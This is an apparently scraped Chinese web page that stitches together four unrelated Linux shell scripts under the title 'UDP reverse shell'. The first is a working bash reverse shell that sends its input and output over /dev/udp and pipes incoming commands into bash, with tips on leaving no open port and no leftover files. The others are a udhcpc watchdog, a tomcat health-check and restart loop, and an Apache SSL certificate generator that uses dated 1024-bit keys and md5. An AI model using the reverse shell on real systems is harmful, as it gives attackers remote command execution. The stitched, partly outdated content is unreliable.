Linux UDP反弹shell脚本脚本安全

2025-01-29|版权声明|我要投稿

Linux UDP反弹shell脚本脚本安全(精选4篇)

Linux UDP反弹shell脚本脚本安全 篇1

无端口

成功启动后无残余文件

一般情况下没有UDP单包512字节的问题,当然你要是执行奇葩的命令我也没办法

非交互式shell,也就是说,你不能用回车来写多行命令。这个问题不是不能解决,而是如果解决这个问题,会造成另外一个我不能忍受的问题。而且反正可以执行命令了,自己另外反弹一个可交互的shell就是了

由于某些bash特性和某些我不能忍受的功能,某些子进程会在链接断开或者输入exit指令一段时间之后才会自动退出

图就不贴了,大家自己玩

#!/bin/bash

exec 3>/dev/udp/127.0.0.1/8080

exec 2>&3

exec 1>&3

echo Welcom back

cat 03 | bash | while read line;do echo $line;done

Linux UDP反弹shell脚本脚本安全 篇2

嵌入式初学者,第一次上传代码。昨天做了一个udhcpd与udhcpc的守护,目前只会用shell模仿编写,还有什么方法可以做守护呢?

#! /bin/sh#进程名字可修改PRO_NAME=udhcpcWLAN=ra0 while true ; do # 用ps获取$PRO_NAME进程数量 NUM=`ps aux | grep ${PRO_NAME} | grep -v grep |wc -l`# echo $NUM# 少于1,重启进程 if [ “${NUM}” -lt “1” ];then echo “${PRO_NAME} was killed” ${PRO_NAME} -i ${WLAN}# 大于1,杀掉所有进程,重启 elif [ “${NUM}” -gt “1” ];then echo “more than 1 ${PRO_NAME},killall ${PRO_NAME}” killall -9 $PRO_NAME ${PRO_NAME} -i ${WLAN} fi# kill僵尸进程 NUM_STAT=`ps aux | grep ${PRO_NAME} | grep T | grep -v grep | wc -l` if [ “${NUM_STAT}” -gt “0” ];then killall -9 ${PRO_NAME} ${PRO_NAME} -i ${WLAN} fidone exit 0

Linux UDP反弹shell脚本脚本安全 篇3

Linux Shell脚本检测tomcat并自动重启

后台运行命令 sh xxx.sh &

查看后台任务:jobs

召唤到前台:fg jobs编号

可以删掉while循环的代码放到crontab里面定时执行,可以将脚本直接后台运行,

#!/bin/bashwhile [ true ]do url=“www.jb51.net/”; httpOK=`curl --connect-timeout 10 -m 60 --head --silent $url | awk ‘NR==1{print $2}‘`; if [ $httpOK == “200” ];then tomcat6=`ps -ef | grep tomcat | awk ‘NR==1{print $1“ ”$2;}‘`; user=`echo $tomcat6 | awk ‘NR==1{print $1}‘`; pid=`echo $tomcat6 | awk ‘NR==1{print $2}‘`; if [ $user != “tomcat” ]; thenservice tomcat6 start; elsekill -9 $pid;sleep 5s;service tomcat6 start;service tomcat6 start;service tomcat6 status; fi; fi; sleep 5m;done;

以上所述就是本文的全部内容了,希望大家能够喜欢,

Linux Shell脚本实现检测tomcat

Linux UDP反弹shell脚本脚本安全 篇4

启用 apache 的 mod_ssl 之后需要有证书才能正常运作,写了个脚本来操作。首先要确定机器上已经有 openssl 。

代码如下:

#!/bin/sh

#

# ssl 证书输出的根目录。

sslOutputRoot=“/etc/apache_ssl”

if [ $# -eq 1 ]; then

sslOutputRoot=$1

fi

if [ ! -d ${sslOutputRoot} ]; then

mkdir -p ${sslOutputRoot}

fi

cd ${sslOutputRoot}

echo “开始创建CA根证书...”

#

# 创建CA根证书,稍后用来签署用于服务器的证书。如果是通过商业性CA如

# Verisign 或 Thawte 签署证书,则不需要自己来创建根证书,而是应该

# 把后面生成的服务器 csr 文件内容贴入一个web表格,支付签署费用并

# 等待签署的证书。关于商业性CA的更多信息请参见:

# Verisign - digitalid.verisign.com/server/apacheNotice.htm

# Thawte Consulting - www.thawte.com/certs/server/request.html

# CertiSign Certificadora Digital Ltda. - www.certisign.com.br

# IKS GmbH - www.iks-jena.de/produkte/ca /

# Uptime Commerce Ltd. - www.uptimecommerce.com

# BelSign NV/SA - www.belsign.be

# 生成CA根证书私钥

openssl genrsa -des3 -out ca.key 1024

# 生成CA根证书

# 根据提示填写各个字段, 但注意 Common Name 最好是有效根域名(如 zeali.net ),

# 并且不能和后来服务器证书签署请求文件中填写的 Common Name 完全一样,否则会

# 导致证书生成的时候出现

# error 18 at 0 depth lookup:self signed certificate 错误

openssl req -new -x509 -days 365 -key ca.key -out ca.crt

echo “CA根证书创建完毕。”

echo “开始生成服务器证书签署文件及私钥 ...”

#

# 生成服务器私钥

openssl genrsa -des3 -out server.key 1024

# 生成服务器证书签署请求文件, Common Name 最好填写使用该证书的完整域名

# (比如: security.zeali.net )

openssl req -new -key server.key -out server.csr

ls -altrh ${sslOutputRoot}/server.*

echo “服务器证书签署文件及私钥生成完毕。”

echo “开始使用CA根证书签署服务器证书签署文件 ...”

#

# 签署服务器证书,生成server.crt文件

# 参见 www.faqs.org/docs/securing/chap24sec195.html

# sign.sh START

#

# Sign a SSL Certificate Request (CSR)

# Copyright (c) 1998-1999 Ralf S. Engelschall, All Rights Reserved.

#

CSR=server.csr

case $CSR in

*.csr ) CERT=“`echo $CSR | sed -e ‘s/.csr/.crt/‘`” ;;

* ) CERT=“$CSR.crt” ;;

esac

#  make sure environment exists

if [ ! -d ca.db.certs ]; then

mkdir ca.db.certs

fi

if [ ! -f ca.db.serial ]; then

echo ‘01‘ >ca.db.serial

fi

if [ ! -f ca.db.index ]; then

cp /dev/null ca.db.index

fi

#  create an own SSLeay config

# 如果需要修改证书的有效期限,请修改下面的 default_days 参数.

# 当前设置为10年.

cat >ca.config <

[ ca ]

default_ca = CA_own

[ CA_own ]

dir = .

certs = ./certs

new_certs_dir = ./ca.db.certs

database = ./ca.db.index

serial = ./ca.db.serial

RANDFILE = ./ca.db.rand

certificate = ./ca.crt

private_key = ./ca.key

default_days = 3650

default_crl_days = 30

default_md = md5

preserve = no

policy = policy_anything

[ policy_anything ]

countryName = optional

stateOrProvinceName = optional

localityName = optional

organizationName = optional

organizationalUnitName = optional

commonName = supplied

emailAddress = optional

EOT

# sign the certificate

echo “CA signing: $CSR ->$CERT:”

openssl ca -config ca.config -out $CERT -infiles $CSR

echo “CA verifying: $CERT <->CA cert”

openssl verify -CAfile ./certs/ca.crt $CERT

# cleanup after SSLeay

rm -f ca.config

rm -f ca.db.serial.old

rm -f ca.db.index.old

# sign.sh END

echo “使用CA根证书签署服务器证书签署文件完毕,

# 使用了 ssl 之后,每次启动 apache 都要求输入 server.key 的口令,

# 你可以通过下面的方法去掉口令输入(如果不希望去掉请注释以下几行代码):

echo “去除 apache 启动时必须手工输入密钥密码的限制:”

cp -f server.key server.key.org

openssl rsa -in server.key.org -out server.key

echo “去除完毕。”

# 修改 server.key 的权限,保证密钥安全

chmod 400 server.key

echo “Now u can configure apache ssl with following:”

echo -e “ SSLCertificateFile ${sslOutputRoot}/server.crt”

echo -e “ SSLCertificateKeyFile ${sslOutputRoot}/server.key”

# die gracefully

exit 0

★ 在Ubuntu系统的服务器上安装Webuzo控制面板的教程

★ Windows Internet信息服务的安装Web服务器

★ 证书抒情散文

★ 质保证书

★ Discuz!开源论坛新手安装教程(基础篇)WEB服务器

★ 阿里云服务器上安装 Ghost方法介绍linux操作系统

★ 证书错误证书错误怎么办

★ 考取证书感言

★ 证书租赁协议书

注:本文为网友上传,旨在传播知识,不代表本站观点,与本站立场无关。若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:iwenmi@163.com

上一篇:应用助手for Android能备份还原哪些资料?下一篇:工厂季度总结

付费复制
期刊天下网10年专业运营,值得您的信赖

限时特价:7.98元/篇

原价:20元
微信支付
已付款请点这里联系客服
欢迎使用微信支付
扫一扫微信支付
微信支付:
支付成功
已获得文章复制权限
确定
常见问题